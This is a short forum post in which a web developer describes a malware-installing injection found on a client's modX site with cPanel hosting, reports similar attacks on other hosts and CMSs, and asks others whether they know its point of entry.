Came across this today with a client's site I'm subcontracting for.
Pages with it are attempting to install malware (of course.)
I've seen it on a bluehost instance, other reports are jumping on goDaddy and other hosting services, so it's obviously not a specific host problem.
This instance has a modX CMS, but have read blogs about it attacking WordPress, so it's not specific to software.
This site is using Cpanel, but have read some reports of some users using other control panels.
The domain names vary, the file names vary, but the one hitting this site WAS found when Googled (it's not anyfile.js)
I read many comments ranging from a compromised DNS modification using credentials of someone's compromised computer to a database injection - which really seems to be the only common thread between the various reports, a database.
All of the documents I read searching it down were recent, like YESTERDAY, not three year old posts. Though the attack isin't new, this round of it appears to be.
My AVG blocked it immediately, and I'm still digging around on this site, in the database, etc., just wondering if anyone recognizes it and knows it's point of entry.